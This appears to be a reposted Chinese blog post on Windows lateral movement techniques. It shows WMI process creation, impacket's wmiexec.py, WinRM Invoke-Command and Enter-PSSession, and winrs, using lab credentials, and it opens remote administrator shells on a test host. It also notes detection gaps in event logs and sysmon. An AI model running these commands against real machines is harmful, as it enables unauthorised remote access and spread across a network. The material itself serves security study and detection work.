标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3408] 作者: ecawen 发表于: [2024-07-13]
本文共 [40] 位读者顶过
一些获取信息例子:
执行命令:wmic /node:ip /user:admin /password:pass process call create 'ipconfig',但是没有结果回显。 执行(Win32_Process)->Create() 方法执行成功。 外参数: instance of __PARAMETERS { ProcessId = 812; ReturnValue = 0; }; 直接用impacket中的wmiexec.py一把梭,python wmiexec.py admin:password@ip [command] Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation [*] SMBv2.1 dialect used [+] Target system is 192.168.138.141 and isFDQN is False [+] StringBinding: \\\\WEB[\\PIPE\\atsvc] [+] StringBinding: web[49154] [+] StringBinding: 192.168.138.141[49154] [+] StringBinding chosen: ncacn_ip_tcp:192.168.138.141[49154] [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami web\administrator
在empire中也有wmi的横向移动的利用模块 使用SMB协议进行登陆,可以告警异常IP登陆。 Windows Remote Management(WinRM)
简介
环境 实践 Test-WSMan -ComputerName 192.168.138.141 wsmid : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd ProductVendor : Microsoft Corporation ProductVersion : OS: 0.0.0 SP: 0.0 Stack: 2.0
Invoke-Command -ComputerName 192.168.138.141 -ScriptBlock { query user } -Credential administrator 用户名 会话名 ID 状态 空闲时间 登录时间 administrator console 2 运行中 无 2019/1/23 17:30 在目标机上执行query user,但是该命令会弹出登陆对话框,不适用于纯命令界面。 Enter-PSSession -ComputerName 192.168.138.141 -Credential administrator [192.168.138.141]: PS C:\Users\Administrator\Documents> ls 目录: C:\Users\Administrator\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 2018/12/27 15:47 SQL Server Management Studio Express d---- 2018/12/27 15:47 Visual Studio 2005 弹回目标机的一个交互式powershell,但是也会弹出登陆对话框。 同winrm成对出现就是winrs——Windows Remote Shell了,避免了弹框的尴尬。 示例: winrs -r:https://myserver.com command winrs -r:myserver.com -usessl command winrs -r:myserver command winrs -r:http://127.0.0.1 command winrs -r:http://169.51.2.101:80 -unencrypted command winrs -r:https://[::FFFF:129.144.52.38] command winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:TEMP=d:\temp config.cmd winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789 winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share 比如winrs -r:ip -u:admin -p:password cmd会生成一个交互式的shell winrs -r:192.168.138.141 -u:administrator -p:123456 cmd Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Users\Administrator> 但是登陆事件中没有记录IP,特点是每执行命令一次就登陆一次。 网络信息: 工作站名: 计算机名 源网络地址: - 源端口: - sysmon里面虽然设置对应的RuleName,但是并没有匹配成功。 Process Create: RuleName: UtcTime: 2019-01-30 03:54:36.759 ProcessGuid: {0eedf899-1ffc-5c51-0000-0010ec105000} ProcessId: 1136 Image: C:\Windows\System32\cmd.exe FileVersion: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Description: Windows 命令处理程序 Product: Microsoft® Windows® Operating System Company: Microsoft Corporation CommandLine: C:\Windows\system32\cmd.exe /C cmd CurrentDirectory: C:\Users\Administrator\ User: WEB\Administrator LogonGuid: {0eedf899-1ff7-5c51-0000-002010ff4f00} LogonId: 0x4fff10 TerminalSessionId: 0 IntegrityLevel: High Hashes: MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A ParentProcessGuid: {0eedf899-1ffc-5c51-0000-00100c0b5000} ParentProcessId: 2340 ParentImage: C:\Windows\System32\winrshost.exe ParentCommandLine: C:\Windows\system32\WinrsHost.exe -Embedding 作者:jjf012 链接:https://www.jianshu.com/p/66bfaaba5fdc 来源:简书 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 |